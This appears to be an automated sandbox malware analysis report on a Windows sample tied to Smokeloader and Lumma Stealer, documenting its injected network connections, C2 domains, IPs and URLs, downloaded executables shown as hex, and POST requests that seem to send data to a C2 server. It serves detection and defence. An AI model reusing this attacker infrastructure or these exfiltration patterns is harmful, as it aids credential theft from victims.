                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then mov eax, dword ptr [esi+00000910h]6_2_00427353
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then mov eax, dword ptr [esi+00000080h]6_2_00427353
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then mov word ptr [eax], cx6_2_004168EF
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then mov ecx, dword ptr [esp+10h]6_2_00409960
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then mov ecx, dword ptr [esp+10h]6_2_00409960
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+20h]6_2_00404970
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then mov ecx, dword ptr [esp+00000084h]6_2_00415FE1
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then dec edx6_2_0043B050
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h6_2_00417062
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then mov ecx, dword ptr [esi+04h]6_2_00417062
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then mov edx, dword ptr [esi+00000080h]6_2_00426174
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then mov eax, dword ptr [esp+54h]6_2_004381BB
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then mov edx, dword ptr [esi+00000080h]6_2_00426271
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then mov edx, dword ptr [esi+00000080h]6_2_00426284
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then mov eax, dword ptr [esp+000001E0h]6_2_004102B2
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]6_2_004164D2
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then mov eax, 00008000h6_2_00403570
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then cmp cl, 0000002Eh6_2_00421580
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]6_2_004025A0
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then cmp byte ptr [ebp+00h], 00000000h6_2_00414660
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then mov edi, ebx6_2_00436670
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then movzx ebx, byte ptr [edx]6_2_00431680
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then mov eax, dword ptr [esp+000000C0h]6_2_004106B1
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then mov dword ptr [esp+000005F0h], 00000000h6_2_004138D2
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]6_2_004248E0
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then mov ecx, dword ptr [esi+30h]6_2_00423931
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then mov ecx, dword ptr [esi+30h]6_2_00423AD0
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then jmp edx6_2_00422AFB
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then mov eax, dword ptr [esp+4Ch]6_2_00415AFA
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]6_2_0040CB10
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then mov eax, dword ptr [esp+000001E0h]6_2_0040FBB4
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then jmp edx6_2_0041CCD0
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then mov edx, dword ptr [esi+00000080h]6_2_00425CEE
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then mov edx, dword ptr [esi+10h]6_2_00423C97
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then mov ecx, dword ptr [esi+08h]6_2_00433D0A
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then movzx esi, word ptr [ecx]6_2_00438F15
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then mov ecx, dword ptr [esp+00000084h]6_2_02106248
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then dec edx6_2_0212B2B7
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h6_2_021072C9
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then mov ecx, dword ptr [esi+04h]6_2_021072C9
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then cmp cl, 0000002Eh6_2_021112E0
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then mov edx, dword ptr [esi+00000080h]6_2_021163DB
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then jmp edx6_2_0210D097
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then movzx esi, word ptr [ecx]6_2_0212917C
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]6_2_02106739
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then mov eax, 00008000h6_2_020F37D7
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then mov edx, dword ptr [esi+00000080h]6_2_021164D8
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then mov edx, dword ptr [esi+00000080h]6_2_021164EB
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then mov eax, dword ptr [esp+000001E0h]6_2_02100519
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then mov eax, dword ptr [esi+00000910h]6_2_021175BA
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then mov eax, dword ptr [esi+00000080h]6_2_021175BA
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then mov word ptr [eax], cx6_2_02106B56
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]6_2_02114B47
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then mov ecx, dword ptr [esi+30h]6_2_02113B98
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then mov ecx, dword ptr [esp+10h]6_2_020F9BC7
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then mov ecx, dword ptr [esp+10h]6_2_020F9BC7
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+20h]6_2_020F4BD7
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]6_2_02114B47
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]6_2_020F2807
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then mov edi, ebx6_2_021268D7
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then cmp byte ptr [ebp+00h], 00000000h6_2_021048C7
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then movzx ebx, byte ptr [edx]6_2_021218E7
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then mov eax, dword ptr [esp+000000C0h]6_2_02100918
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then mov ecx, dword ptr [esi+08h]6_2_02123E13
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then mov eax, dword ptr [esp+000001E0h]6_2_020FFE1B
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then mov edx, dword ptr [esi+10h]6_2_02113ECF
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then mov edx, dword ptr [esi+10h]6_2_02113EFE
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then jmp dword ptr [004421CCh]6_2_0210CF1A
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then mov edx, dword ptr [esi+00000080h]6_2_02115F55
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then mov ecx, dword ptr [esp+000000A0h]6_2_02111C89
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then jmp edx6_2_02112D5B
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then mov eax, dword ptr [esp+4Ch]6_2_02105D61
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]6_2_020FCD77

                Networking

                barindex
                Snort IDS alert for network traffic
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49736 -> 190.28.110.209:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49737 -> 190.28.110.209:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49738 -> 190.28.110.209:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49739 -> 190.28.110.209:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49740 -> 190.28.110.209:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49741 -> 190.28.110.209:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49743 -> 190.28.110.209:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49744 -> 190.28.110.209:80
                Source: TrafficSnort IDS: 2052787 ET TROJAN DNS Query to Lumma Stealer Domain (whispedwoodmoodsksl .shop) 192.168.2.4:52163 -> 1.1.1.1:53
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49746 -> 190.28.110.209:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49748 -> 190.28.110.209:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52655 -> 190.28.110.209:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52656 -> 190.28.110.209:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52658 -> 190.28.110.209:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52693 -> 190.28.110.209:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52694 -> 190.28.110.209:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52695 -> 190.28.110.209:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52696 -> 190.28.110.209:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52697 -> 190.28.110.209:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52698 -> 190.28.110.209:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52736 -> 185.18.245.58:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52737 -> 185.18.245.58:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52738 -> 185.18.245.58:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52739 -> 185.18.245.58:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52740 -> 185.18.245.58:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52741 -> 185.18.245.58:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52742 -> 185.18.245.58:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52743 -> 185.18.245.58:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52744 -> 185.18.245.58:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52745 -> 185.18.245.58:80
                Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52746 -> 185.18.245.58:80
                System process connects to network (likely due to code injection or exploit)
                Source: C:\Windows\explorer.exeNetwork Connect: 91.202.233.231 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 190.28.110.209 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 23.145.40.124 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 185.18.245.58 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 45.129.96.86 80Jump to behavior
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: boredimperissvieos.shop
                Source: Malware configuration extractorURLs: holicisticscrarws.shop
                Source: Malware configuration extractorURLs: sweetsquarediaslw.shop
                Source: Malware configuration extractorURLs: plaintediousidowsko.shop
                Source: Malware configuration extractorURLs: miniaturefinerninewjs.shop
                Source: Malware configuration extractorURLs: zippyfinickysofwps.shop
                Source: Malware configuration extractorURLs: obsceneclassyjuwks.shop
                Source: Malware configuration extractorURLs: acceptabledcooeprs.shop
                Source: Malware configuration extractorURLs: whispedwoodmoodsksl.shop
                Source: Malware configuration extractorURLs: boredimperissvieos.shop
                Source: Malware configuration extractorURLs: holicisticscrarws.shop
                Source: Malware configuration extractorURLs: sweetsquarediaslw.shop
                Source: Malware configuration extractorURLs: plaintediousidowsko.shop
                Source: Malware configuration extractorURLs: miniaturefinerninewjs.shop
                Source: Malware configuration extractorURLs: zippyfinickysofwps.shop
                Source: Malware configuration extractorURLs: obsceneclassyjuwks.shop
                Source: Malware configuration extractorURLs: acceptabledcooeprs.shop
                Source: Malware configuration extractorURLs: whispedwoodmoodsksl.shop
                Source: Malware configuration extractorURLs: boredimperissvieos.shop
                Source: Malware configuration extractorURLs: boredimperissvieos.shop
                Source: Malware configuration extractorURLs: holicisticscrarws.shop
                Source: Malware configuration extractorURLs: sweetsquarediaslw.shop
                Source: Malware configuration extractorURLs: plaintediousidowsko.shop
                Source: Malware configuration extractorURLs: miniaturefinerninewjs.shop
                Source: Malware configuration extractorURLs: zippyfinickysofwps.shop
                Source: Malware configuration extractorURLs: obsceneclassyjuwks.shop
                Source: Malware configuration extractorURLs: acceptabledcooeprs.shop
                Source: Malware configuration extractorURLs: whispedwoodmoodsksl.shop
                Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199689717899
                Source: Malware configuration extractorURLs: http://dbfhns.in/tmp/index.php
                Source: Malware configuration extractorURLs: http://guteyr.cc/tmp/index.php
                Source: Malware configuration extractorURLs: http://greendag.ru/tmp/index.php
                Source: Malware configuration extractorURLs: http://lobulraualov.in.net/tmp/index.php
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.22.1Date: Sun, 26 May 2024 08:22:31 GMTContent-Type: application/octet-streamContent-Length: 325120Last-Modified: Sun, 26 May 2024 08:20:02 GMTConnection: keep-aliveETag: "6652f0b2-4f600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 5b 37 b0 84 3a 59 e3 84 3a 59 e3 84 3a 59 e3 89 68 86 e3 98 3a 59 e3 89 68 b9 e3 09 3a 59 e3 89 68 b8 e3 aa 3a 59 e3 8d 42 ca e3 8d 3a 59 e3 84 3a 58 e3 e7 3a 59 e3 31 a4 bc e3 85 3a 59 e3 89 68 82 e3 85 3a 59 e3 31 a4 87 e3 85 3a 59 e3 52 69 63 68 84 3a 59 e3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 0e 81 f9 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 0c 01 00 00 74 08 00 00 00 00 00 86 3d 00 00 00 10 00 00 00 20 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 90 09 00 00 04 00 00 70 bc 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e4 83 01 00 64 00 00 00 00 e0 08 00 08 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 84 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 78 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 33 0b 01 00 00 10 00 00 00 0c 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 02 6c 00 00 00 20 01 00 00 6e 00 00 00 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 08 46 07 00 00 90 01 00 00 ce 02 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 08 a8 00 00 00 e0 08 00 00 aa 00 00 00 4c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 26 May 2024 08:23:01 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sun, 26 May 2024 08:16:06 GMTETag: "205e00-619570326fd80"Accept-Ranges: bytesContent-Length: 2121216Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 0a 09 00 00 50 17 00 00 00 00 00 1c 18 09 00 00 10 00 00 00 20 09 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 20 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 60 09 00 4a 22 00 00 00 70 0a 00 00 44 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 09 00 3c bd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 09 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 84 08 09 00 00 10 00 00 00 0a 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 c4 26 00 00 00 20 09 00 00 28 00 00 00 0e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 2d 0d 00 00 00 50 09 00 00 00 00 00 00 36 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 4a 22 00 00 00 60 09 00 00 24 00 00 00 36 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 90 09 00 00 00 00 00 00 5a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 a0 09 00 00 02 00 00 00 5a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 3c bd 00 00 00 b0 09 00 00 be 00 00 00 5c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 44 16 00 00 70 0a 00 00 44 16 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 20 00 00 00 00 00 00 5e 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: global trafficHTTP traffic detected: GET /profiles/76561199689717899 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 104.102.42.29 104.102.42.29
                Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                Source: Joe Sandbox ViewIP Address: 185.235.137.54 185.235.137.54
                Source: Joe Sandbox ViewIP Address: 185.235.137.54 185.235.137.54
                Source: Joe Sandbox ViewASN Name: SURFAIRWIRELESS-IN-01US SURFAIRWIRELESS-IN-01US
                Source: Joe Sandbox ViewASN Name: AKAMAI-ASUS AKAMAI-ASUS
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: UNINETAZ UNINETAZ
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: whispedwoodmoodsksl.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 74Host: whispedwoodmoodsksl.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18158Host: whispedwoodmoodsksl.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8779Host: whispedwoodmoodsksl.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20432Host: whispedwoodmoodsksl.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 7083Host: whispedwoodmoodsksl.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1230Host: whispedwoodmoodsksl.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 582478Host: whispedwoodmoodsksl.shop
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHDGDHJEGHIDGDHCGCBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
